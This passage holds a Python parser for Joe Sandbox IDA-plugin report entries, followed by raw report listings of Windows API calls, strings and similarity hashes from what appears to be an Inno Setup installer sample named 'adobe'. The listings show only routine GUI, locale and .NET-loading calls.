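    r"(?P<name>[A-Za-z0-9_]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# One string entry:  text, xrefs: ADDR   (the text may itself contain commas)
STR_RE = re.compile(r"^\s*(?:•\s*)?(?P<text>.*), xrefs: (?P<xref>[0-9A-Fa-f]+)\s*$")
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")
HEADERS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
           "Similarity", "Uniqueness")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int] = None   # set when the call sits inside a callee

    @property
    def unresolved(self) -> bool:
        # The report prints a raw address (e.g. 73A1A570) when it could not name the import
        return bool(HEX_RE.match(self.name))


@dataclass
class StringRef:
    text: str
    xref: int


@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[StringRef] = field(default_factory=list)


def parse_block(text: str) -> FunctionBlock:
    """Walk one function entry; only the APIs and Strings sections produce records."""
    block, section = FunctionBlock(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a != ""]
            sub = int(m["sub"], 16) if m["sub"] else None
            block.apis.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), sub))
        elif section == "Strings" and (m := STR_RE.match(line)):
            block.strings.append(StringRef(m["text"], int(m["xref"], 16)))
    return block


def string_arguments(block: FunctionBlock) -> List[str]:
    """Arguments the stack view resolved to text rather than a value or '?'.
    Module and export names here are the giveaway for GetProcAddress-style resolution."""
    seen: List[str] = []
    for call in block.apis:
        for a in call.args:
            if a != "?" and not HEX_RE.match(a) and a not in seen:
                seen.append(a)
    return seen


def call_sequence(block: FunctionBlock) -> List[str]:
    """API names in address order, leaving out calls attributed to subcalls."""
    own = [c for c in block.apis if c.subcall_of is None]
    return [c.name for c in sorted(own, key=lambda c: c.ref)]


SAMPLE = """\
APIs
• GetLastError.KERNEL32(00000000,004597AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495ECB,?,00000000,00495F6E), ref: 004596F2
  • Part of subcall function 00453920: FindClose.KERNEL32(000000FF,00453A16), ref: 00453A05
Strings
• Failed to strip read-only attribute., xrefs: 004596C0
• Failed to delete directory (%d). Will retry later., xrefs: 0045970B
• Deleting directory: %s, xrefs: 0045967B
"""

if __name__ == "__main__":
    blk = parse_block(SAMPLE)
    for c in blk.apis:
        print(f"{c.ref:08X} {c.module}!{c.name} args={len(c.args)} subcall_of={c.subcall_of}")
    for s in blk.strings:
        print(f"{s.xref:08X} {s.text!r}")
```

Feeding the whole listing through parse_block one entry at a time gives a table of (ref, module!name, arguments) per function; string_arguments surfaces entries like kernel32.dll and GetFinalPathNameByHandleA that only appear in the stack view, and ApiCall.unresolved flags the raw-address calls (73A1A570.USER32 further down) that need a second look in the dump.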

APIs
• GetCapture.USER32 ref: 00422EB4
• GetCapture.USER32 ref: 00422EC3
• SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
• ReleaseCapture.USER32 ref: 00422ECE
• GetActiveWindow.USER32 ref: 00422EDD
• SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
• SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
• GetActiveWindow.USER32 ref: 00422FCF
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CaptureMessageSend$ActiveWindow$Release
• String ID:
• API String ID: 862346643-0
• Opcode ID: 8182acde5771262159e4f659bae907e1166abbb07305575d687dab3498c67f02
• Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
• Opcode Fuzzy Hash: 8182acde5771262159e4f659bae907e1166abbb07305575d687dab3498c67f02
• Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
• GetWindowLongA.USER32(?,000000EC), ref: 0042F145
• GetActiveWindow.USER32 ref: 0042F14E
• MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
• SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Window$ActiveLong$Message
• String ID:
• API String ID: 2785966331-0
• Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
• Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
• Opcode Fuzzy Hash: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
• Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • 73A1A570.USER32(00000000), ref: 0042949A
                                                                                                                                                          • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                                                                                            • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                                                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                                                                                                          • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                                                                                          • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 361401722-0
                                                                                                                                                          • Opcode ID: 39fe41d515b6e139a7fb993673c493c01ad0263482789a8114dfaf7291a0699f
                                                                                                                                                          • Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
                                                                                                                                                          • Opcode Fuzzy Hash: 39fe41d515b6e139a7fb993673c493c01ad0263482789a8114dfaf7291a0699f
                                                                                                                                                          • Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • 73A1A570.USER32(00000000,?,00419069,004972A6), ref: 0041DE37
                                                                                                                                                          • 73A24620.GDI32(00000000,0000005A,00000000,?,00419069,004972A6), ref: 0041DE41
                                                                                                                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004972A6), ref: 0041DE4E
                                                                                                                                                          • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                                                                                          • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                                                                                          • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                                                                                          • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ObjectStock$A24620A480A570IconLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3573811560-0
                                                                                                                                                          • Opcode ID: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                                                                                                          • Instruction ID: b4cf756beaef1adc4f5fbcf44fabff1cc3cb88bfcb9329de381bdc5a6adb432b
                                                                                                                                                          • Opcode Fuzzy Hash: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                                                                                                          • Instruction Fuzzy Hash: 88113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DB7D1CA49BAE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00462B6C
                                                                                                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,00462C01), ref: 00462B72
                                                                                                                                                          • SetCursor.USER32(?,00462BE9,00007F02,00000000,00462C01), ref: 00462BDC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Cursor$Load
                                                                                                                                                          • String ID: $ $Internal error: Item already expanding
                                                                                                                                                          • API String ID: 1675784387-1948079669
                                                                                                                                                          • Opcode ID: 5deb935177b2749db64ae3d1a30dd8aa8d24bf9f3c0682c3c1b51a54a95d7d69
                                                                                                                                                          • Instruction ID: 311ca96f077e1f8384384c33a5c3f76c8765359b8b10716ccdf0848656b08f70
                                                                                                                                                          • Opcode Fuzzy Hash: 5deb935177b2749db64ae3d1a30dd8aa8d24bf9f3c0682c3c1b51a54a95d7d69
                                                                                                                                                          • Instruction Fuzzy Hash: 4EB19030600A04EFD710DF69C685B9ABBF1FF44304F1484AAE8459B792E7B8ED45CB5A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 004758C5
                                                                                                                                                          • 73A259E0.USER32(00000000,000000FC,00475820,00000000,00475B04,?,00000000,00475B2E), ref: 004758EC
                                                                                                                                                          • GetACP.KERNEL32(00000000,00475B04,?,00000000,00475B2E), ref: 00475929
                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0047596F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A259ClassInfoMessageSend
                                                                                                                                                          • String ID: COMBOBOX$Inno Setup: Language
                                                                                                                                                          • API String ID: 3217714596-4234151509
                                                                                                                                                          • Opcode ID: 41c5c7ded79787b2e50a7b61f8228310a1637d7bd4ca490c7c1498f7bf0968a7
                                                                                                                                                          • Instruction ID: e49daa43e03c71068c6435758e3380e7ad7aa0efbc45612d2d59fcec593b4e77
                                                                                                                                                          • Opcode Fuzzy Hash: 41c5c7ded79787b2e50a7b61f8228310a1637d7bd4ca490c7c1498f7bf0968a7
                                                                                                                                                          • Instruction Fuzzy Hash: 2E814C34600609DFCB10DF69D985AAEB7F0FB09314F1481BAE809EB362D774AD01CB98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                                                                                            • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                                                                            • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoLocale$DefaultSystem
                                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                          • API String ID: 1044490935-665933166
                                                                                                                                                          • Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                                                                                                          • Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
                                                                                                                                                          • Opcode Fuzzy Hash: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                                                                                                          • Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                                                                                                          • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                                                                                            • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                                                                                                          • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                                                                                            • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                                                                                                          • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                                                                          • String ID: ,$?
                                                                                                                                                          • API String ID: 2359071979-2308483597
                                                                                                                                                          • Opcode ID: 2d5d1555a5a769ac59b6b27b0feb9421646c1aec55e735ee341e73b68b6ef4a1
                                                                                                                                                          • Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
                                                                                                                                                          • Opcode Fuzzy Hash: 2d5d1555a5a769ac59b6b27b0feb9421646c1aec55e735ee341e73b68b6ef4a1
                                                                                                                                                          • Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C
                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
• GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
• GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
• GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
• GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
• DeleteObject.GDI32(?), ref: 0041BFAF
• DeleteObject.GDI32(?), ref: 0041BFB8
• CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Object$BitmapBitsDelete$CreateIcon
• String ID:
• API String ID: 1030595962-0
• Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
• Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
• Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
• Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
• 73A24620.GDI32(00000000,00000026), ref: 0041CF2D
• 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
• 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
• StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
• StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
• 73A18830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Stretch$A18830$A122A24620BitsMode
• String ID:
• API String ID: 430401518-0
• Opcode ID: 82a1241456fd04a0e88beeb3c6f30cae89a111749c76fc10312dff3b31cb2f83
• Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
• Opcode Fuzzy Hash: 82a1241456fd04a0e88beeb3c6f30cae89a111749c76fc10312dff3b31cb2f83
• Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000000,?,?), ref: 00456626
  • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
  • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
  • Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045668D
• TranslateMessage.USER32(?), ref: 004566AB
• DispatchMessageA.USER32(?), ref: 004566B4
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
• String ID: [Paused]
• API String ID: 3047529653-4230553315
• Opcode ID: 46a11ba5551cbee924e7941ad509293be0bffb06fa5ea0530ea92a8540b83dd1
• Instruction ID: 5407cbc40fbc40e780d40e1261d4b357eeff69e385f34c28e7b25352baa03612
• Opcode Fuzzy Hash: 46a11ba5551cbee924e7941ad509293be0bffb06fa5ea0530ea92a8540b83dd1
• Instruction Fuzzy Hash: 1531F970A042449EDB01DBB5DC41BCE7FB8EB0D314F95407BE800E3292D67C9909CBA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCursor.USER32(00000000,0046A8A3), ref: 0046A820
• LoadCursorA.USER32(00000000,00007F02), ref: 0046A82E
• SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A8A3), ref: 0046A834
• Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A8A3), ref: 0046A83E
• SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A8A3), ref: 0046A844
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Cursor$LoadSleep
• String ID: CheckPassword
• API String ID: 4023313301-1302249611
• Opcode ID: 5e80330db92469ee82be328683be68e89d347e0d68e8a5b36adfc2f5a11641a7
• Instruction ID: 24335674b3d5fb7c894fb49b41c605e8f494223e4efa829e11476080a36dc80c
• Opcode Fuzzy Hash: 5e80330db92469ee82be328683be68e89d347e0d68e8a5b36adfc2f5a11641a7
• Instruction Fuzzy Hash: 1B31A634640604AFD711EB65C989B9E7BE4EF08304F5580B6F800AB392D778AE41CB4A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045905F
Strings
• Fusion.dll, xrefs: 00458FFF
• .NET Framework CreateAssemblyCache function failed, xrefs: 00459082
• Failed to load .NET Framework DLL "%s", xrefs: 00459044
• CreateAssemblyCache, xrefs: 00459056
• Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045906A
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressProc
• String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
• API String ID: 190572456-3990135632
• Opcode ID: 41e9d5eb920c00926123e1a849cae2195e58bd80d0ce90c3564c700ac9e58668
• Instruction ID: 49fa37d207b3bde44fa74f6dc789ce75dc8756d182da30fc118c482de8ca19ac
• Opcode Fuzzy Hash: 41e9d5eb920c00926123e1a849cae2195e58bd80d0ce90c3564c700ac9e58668
• Instruction Fuzzy Hash: 7931D670E04609EBCB00EFA5C88169EB7B8EF45715F40857BE814E7382DB389E088799
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
• GetFocus.USER32 ref: 0041C178
• 73A1A570.USER32(?), ref: 0041C184
• 73A18830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
• 73A122A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
• GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
